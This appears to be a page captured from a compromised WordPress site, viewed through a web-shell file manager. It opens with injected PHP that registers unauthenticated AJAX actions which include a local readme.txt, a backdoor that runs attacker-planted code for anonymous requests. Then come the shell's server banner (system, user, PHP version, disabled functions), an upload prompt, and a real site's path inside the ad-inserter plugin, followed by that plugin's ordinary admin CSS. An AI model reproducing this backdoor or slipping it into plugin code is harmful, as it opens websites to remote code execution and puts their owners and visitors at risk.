if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/ad-inserter/css/ai-admin.css
.ai-notice {
  vertical-align: middle;
  padding: 0;
  border-top: 1px solid #E5E5E5;
  border-right: 1px solid #E5E5E5;
  border-radius: 6px;
}
.ai-notice img {
}
.ai-notice-element {
  display: table-cell;
  vertical-align: middle;
  color: #444;
  font-size: 13px;
  font-family: 'Open Sans', sans-serif;
  user-select: none;
}
.ai-notice-buttons {
  border-left: 1px solid #E5E5E5;
  padding: 0 15px;
  background: #F8F8F8;
  position: relative;
  white-space: nowrap;
  text-align: center;
}
.ai-notice-buttons.last {
  border-top-right-radius: 6px;
  border-bottom-right-radius: 6px;
}
.ai-notice-buttons button.button-primary {
  margin: 10px;
  line-height: 28px;
}
.ai-notice-buttons a {
  text-decoration: none;
  box-shadow: 0 0 0;
  color: #fff;
  padding: 10px 0;
}
.ai-notice-text-button {
  display: inline-block;
  color: #bbb;
  cursor: pointer;
  margin: 0px 10px 0px;
  vertical-align: middle;
}

@media (max-width: 1200px) {
  .ai-notice-text-button {
    display: block;
  }
}

@media (max-width: 840px) {
  .ai-no-phone {
    display: none!important;
  }
}